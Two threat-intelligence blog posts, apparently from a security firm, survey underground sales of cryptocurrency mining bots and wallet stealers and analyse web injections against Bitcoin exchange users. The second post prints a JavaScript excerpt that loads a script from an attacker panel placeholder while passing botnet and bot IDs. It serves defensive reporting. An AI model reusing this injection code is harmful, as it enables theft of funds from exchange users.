Exploiting the World of WebMoney

The appearance of virtual money has played in favor of cyber criminals. The level of anonymity provided by crypto currencies is significantly higher than in real money transactions, and leaves much more space for performing illegal activities.

The first and most obvious way to exploit WebMoney and earn an easy profit is to mine virtual currencies via botnets specifically created for the purpose. The underground is awash with different mining bots, miners and mining Trojans for sale (downloads are also available), all of which are designated to infects PCs of naive users and exploit their PC CPU/GPU resources to mine the precious coins. The price range varies widely, starting at $50-$100 for a build of a simple Bitcoin/Litecoin miner, to $400-$500 for more sophisticated malware capable of mining a wider variety of virtual currencies (such as Namecoins, Dogecoins, QuarkCoins, etc.) and reaching $1,000-$1,500 for complete mining kits that can mine coins on processor or video cards, contain UAC bypass and web panel for statistical management of the bots, are signed with a digital certificate, and more.

Litecoin mining Bot
Litecoin mining Bot
"Diamond Axe" - another mining bot
“Diamond Axe” – another mining bot

The abundance of different mining platforms identified over the past year has created some difficulties for those making a living in this area. Prices dropped due to the increase in supply, while in parallel, the miners became more detectable by AV vendors, as a large number of them operate by the same mechanism. We identified forums threads from members looking for alternative methods of money-making, stressing their preference for malware capable of virtual money theft.

This can perhaps shed some light on the shift in the activities of cybercriminals in this area – from creating mining botnets, to stealing coins from web wallets. Indeed, in the last month alone, we identified three different stealers of Bitcoin wallets: *coin Grabber, Stealer coins and Wallet Stealer. While the tools are not very sophisticated, they can cause a great deal of damage. *coin Grabber is designed to steal data (files and passwords) from Bitcoin-QT, MultiBit, Armory and Electrum wallets during the transaction process, and costs $500. Stealer Coins is supposed to search for and steal Bitcoin wallet files and send them to FTP, and is sold for $250. The Wallet Stealer is capable of stealing different kinds of WebMoney (not only Bitcoins) from Armory and MultiBit wallets and bypass UAC, and it costs $600.

The Administration Panel of *coin Grabber
The Administration Panel of *coin Grabber

In conclusion, we should mention again the three injection codes for Bitcoin exchanges that were found on one of the Russian underground forums (we wrote about this in detail about a week ago). This code replaces the values of the send-to-address, send-value and the send button elements, thus exploiting vulnerability on the exchange website.
As time goes by, we are witnessing the evolution of more and more cybercrime tools aimed at the relatively young but very profitable area of web currencies. The simple, easy methods are being abandoned for more complicated ones and new trends are popping up, like in other spheres of the dynamic cyber crime world.

Bitcoin Exchange Script Injection Vulnerability

Written by Assaf Keren

It is no secret that Bitcoin is under a lot of scrutiny lately.

Bitcoin
Bitcoin

From publicized breaches of Bitcoin trading sites, to wild fluctuations of the its value, the virtual currency that was considered a hot commodity until very recently is floundering. Perhaps the most alarming story demonstrating the instability of this currency is Mount Gox, once the largest Bitcoin exchange in the world. The site first closed, then filed for bankruptcy, and its CEO’s Twitter account was hacked. With all this controversy, the public is left wondering about the future of Bitcoin and  the level of security the exchange site provides. Naturally, hackers have also taken notice and have started looking for breaches on other Bitcoin exchange sites. Alongside the flurry of phishing emails, Bitcoin mining bots and attempts to hack into Bitcon exchange sites, there is a new trend, utilizing the ability of Trojans to hijack http sessions or plain old XSS and CSRF attacks, the attackers are injecting site-specific code to users and then scan for available funds in the user accounts and steal money from the accounts.

Recently, our analysts have come upon four different injection codes, three for Bitcoin exchanges and one for a betting site. All of these are fashioned in the same way,  and are clearly written by the same author.

Below is an excerpt from one of the injections:

S:function(data){
var s = document.createElement(‘script’);
s.type = ‘text/javascript’;
s.async=false;
s.src = “{HERE_ADMIN_URL}/?s=bitcoin&v=2&m=%BOTNET%&b=%BOTID%&t=”+data+”&rnd=”+Math.random();
s.onerror = s.onload = s.onreadystatechange = function(){
if(!this.loaded && (!this.readyState || this.readyState == ‘loaded’ || this.readyState == ‘complete’)){
this.onerror = this.onload = this.onreadystatechange = null;
}
}
if(document.getElementsByTagName(‘head’).length){ document.getElementsByTagName(‘head’)[0].appendChild(s); }else{ document.appendChild(s); }
}

In the continuation of the code, the attackers change the CSS setting of the site, and replace the values of the send-to-address, send-value and the send button elements. All in all, this is a very simple and elegant code that utilizes the context in which it is run.

This is not a new method of attack – it has been widely used in the past and probably will continue to be used in the future. However, it demands a good understanding of how the exchanges work and how they fashion their web services and it is very version-specific. To the exchanges, however, this is bad news since this targeting of the users is something that they have a limited capability to defend against (unlike attacks on their servers).

The process that the exchanges are going through is very similar to what banks and e-commerce services went through when they started providing Internet services. The problem is that banks have the ability, staff and resources (and insurance) to limit transactions and work with customers on fraud cases, while Bitcoin exchanges do not have that kind of capability yet. Even if a specific attack is stopped, we will probably see more and more attacks on Bitcoin (and other currencies) users. This is just one more step in the evolution of crypto-currency to a more mature state.